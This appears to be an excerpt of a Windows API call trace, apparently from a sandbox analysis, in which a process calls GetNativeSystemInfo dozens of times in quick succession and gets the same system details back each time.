	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.532] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.533] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.534] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.535] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.536] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0025.537] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
